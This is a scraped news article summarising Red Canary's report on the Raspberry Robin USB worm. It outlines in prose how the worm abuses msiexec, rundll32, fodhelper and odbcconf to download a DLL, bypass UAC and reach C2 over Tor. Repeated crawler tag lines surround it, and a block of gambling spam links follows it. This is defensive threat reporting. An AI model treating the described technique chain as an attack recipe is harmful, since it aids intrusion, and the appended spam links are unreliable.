• krseoSpider
  • krseoSpider
  • krseoSpider
  • krseoSpider
  • krseoSpider
  • krseoSpider
  • krseoSpider
  • krseoSpider
  • krseoSpider
  • krseoSpider
  • krseoSpider
  • krseoSpider
  • krseoSpider
  • krseoSpider
  • krseoSpider
  • krseoSpider
  • krseoSpider
  • krseoSpider
  • krseoSpider
  • krseoSpider
  • krseoSpider
  • krseoSpider
  • krseoSpider
  • krseoSpider
  • krseoSpider
  • krseoSpider
  • krseoSpider
  • krseoSpider
  • krseoSpider
  • krseoSpider
  • krseoSpider
  • krseolinkSpider
  • krseolinkSpider
  • krseolinkSpider
  • krseolinkSpider
  • krseolinkSpider
  • krseolinkSpider
  • krseolinkSpider
  • krseolinkSpider
  • krseolinkSpider
  • krseolinkSpider
  • krseolinkSpider
  • krseolinkSpider
  • krseolinkSpider
  • krseolinkSpider
  • krseolinkSpider
  • krseolinkSpider
  • krseolinkSpider
  • krseolinkSpider
  • krseolinkSpider
  • krseolinkSpider
  • krseolinkSpider
  • krseolinkSpider
  • krseolinkSpider
  • krseolinkSpider
  • krseolinkSpider
  • krseolinkSpider
  • krseolinkSpider
  • krseolinkSpider
  • krseolinkSpider
  • krseolinkSpider
  • USB-based Wormable Raspberry Robin Malware Targeting Windows Installer
    Home Hacking USB-based Wormable Raspberry Robin Malware Targeting Windows Installer

    USB-based Wormable Raspberry Robin Malware Targeting Windows Installer

    Source Link

    The malware Raspberry Robin is distributed via external drives and uses Microsoft Standard installer to execute malicious commands.

    Red Canary’s Detection Engineering team has discovered a new worm-like Windows malware being distributed via removable USB drives. The malware was detected in several customer networks, mainly in the manufacturing and technology sectors.

    About Raspberry Robin

    Red Canary intelligence analysts attributed the malware to the Raspberry Robin cluster, noting that the worm leverages “Windows Installer” to access QNAP-linked domains and download a malicious DLL.

    Raspberry Robin’s activity was first documented in September 2021. The operator’s objective is unclear, and researchers are also clueless about when and how the external drives get infected. They suspect that this infection occurs offline.

    Attack Chain Details

    Raspberry Robin’s attack chain starts with connecting an infected external/USB drive to a Windows device. Researchers noted that adversaries use msiexec.exe to deliver malware while “Raspberry Robin uses msiexec.exe to attempt external network communication to a malicious domain for C2 purposes.

    Lauren Podber and Stef Rand
    Red Canary

    The external drive is equipped with the worm payload that appears as a .LNK shortcut file in a legit folder. The worm creates a new process using cmd.exe to read/execute the malicious file on the USB drive.

    According to Red Canary’s blog post, once this is done, the worm launches explorer.exe and msiexec.exe. The latter is used to establish network communication with a rogue domain and for downloading/installing the DLL library file.

    USB-based Wormable Raspberry Robin Malware Targeting Windows Installer
    Raspberry Robin event outline (Red Canary)

    This DLL file is loaded and executed using legitimate Windows utilities like rundll32.exe, fodhelper.exe, and odbcconf.exe to bypass the UAC (User Account Control). Researchers also detected an outbound C2 contact involving regsvr32.exe, dllhost.exe, and rundll32.exe processes to IP addresses linked with Tor nodes.

    Regarding why the worm installs a malicious DLL, the researchers were unclear. They hypothesized that it could be done to maintain persistence on the infected machine.

    More Windows Malware News

    1. Beware of Fake Windows 11 Update Delivering Malware
    2. LodaRAT Windows malware now hunting Android devices
    3. New malware tool can steal files from air-gapped PCs using USBs
    4. PyMICROPSIA Windows malware steals browsing data, records audio
    5. Fake Windows website dropped Redline malware as Windows 11 upgrade

    Related Articles

    Leave a Comment

    techhipbettruvabetnorabahisbahis forumutaraftarium24eduedueduedueduedueduedueduedu
    padişahbet giriş
    betmatik
    vegabet giriş
    neyine
    rokubet
    lüks casino güncel giriş
    betwild giris
    kingbetting giriş
    plinko romania
    imajbet giriş
    padişahbet güncel giriş
    pin up aviator
    cashwin giris
    biabet giriş
    casinomilyon güncel giriş
    biabet giris
    betwild giris
    rexbet giriş
    свит бонанза
    sugar rush 1000